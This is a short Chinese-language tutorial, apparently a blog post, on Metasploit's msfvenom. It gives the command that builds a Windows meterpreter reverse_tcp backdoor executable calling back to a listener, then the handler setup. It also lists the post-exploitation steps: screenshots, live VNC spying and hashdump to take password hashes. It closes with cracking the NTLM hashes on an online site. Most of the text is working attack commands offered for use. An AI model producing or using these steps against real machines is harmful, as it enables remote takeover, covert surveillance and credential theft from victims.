msfvenom是Metasploit Framework 中的一个关键工具,用于生成各种类型的恶意软件载荷。并且该工具的兼容性也非常好,可以生成涵盖Windows,Linux,Macos,android等的系统的木马程序。
msfvenom的简单使用:
本人使用msfvenom是在KaliLinux中进行使用的,下面是一些简单的使用方式:
1.msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.2.134 lport=9999 -f exe -o test.exe
这一行指令是用来生成一个借助反tcp监听的适用于Windows 64位操作系统的远控后门木马,执行完之后会在你的终端目录下生成一个名为test.exe的木马程序。
2.msfconsole
执行该指令会进入一个全新的终端,用于进行对msf的参数配置和目标机的监听。
这里可以看到,这时候的终端为msf6终端
3.use exploit/multi/handler
这句指令意思是用msf6进行攻击多个目标机,这里设置的是一个意图。
4.set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.2.134
set lport 9999
这里设置的是payload以及本机的host和port,注意这里设置的一定要与上面生成木马的时候保持一致。
5.run
这一句就是开始进行监听,如果有目标机点击了你的木马程序这里的终端会自动切换成目标机的终端。
6.screenshot
run vnc
hashdump
这三个指令实在msf夺取了目标机的终端后才可以执行的,screenshot的意思是对目标机进行截图并且保存到本机,run vnc则是可以对目标机进行实时监控,hashdump是获取目标机的密码,不过要说的是,这时候获取的密码为Windows中经过ntml加密的密文,需要进行破译才可获取明文密码。
破译方式也很简单,只需要到浏览器上输入cmd5
这里打开了在线破解网站,然后类型改为ntml,这样就可以对刚才获取的密文进行破解,这样就得到了目标机的密码了。